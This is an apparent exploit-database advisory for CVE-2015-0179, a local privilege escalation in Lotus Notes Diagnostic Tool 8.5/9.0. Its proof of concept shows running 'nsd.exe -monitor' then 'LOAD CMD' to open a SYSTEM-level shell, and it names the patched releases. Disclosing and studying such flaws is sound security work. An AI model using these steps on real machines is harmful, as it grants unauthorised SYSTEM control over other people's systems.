Lotus Notes Diagnostic Tool 8.5 / 9.0 Privilege Escalation

2017.09.05

Credit: ParagonSec

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2015-0179

CWE: CWE-264

CVSS Base Score: 7.2/10

Impact Subscore: 10/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation
# Date: 02-09-2017
# Exploit Author: ParagonSec
# Website: https://github.com/paragonsec
# Version: 8.5 & 9.0
# Tested on: Windows 7 Enterprise
# CVE: CVE-2015-0179
# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029
# Category: Local & Privilege Escalation Exploit
1. Description
Lotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights.
This can be leveraged to run a program under the System context and elevate
local privileges.
2. Proof of Concept
First you need to execute nsd.exe under the monitor/CLI mode:
> nsd.exe -monitor
Next, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.
nsd> LOAD CMD
You will see that cmd is opened as System now.
Also, NSD can be used to attach, kill processes or create memory dumps under the System context.
3. Solution:
This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lotus Notes Diagnostic Tool 8.5 / 9.0 Privilege Escalation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.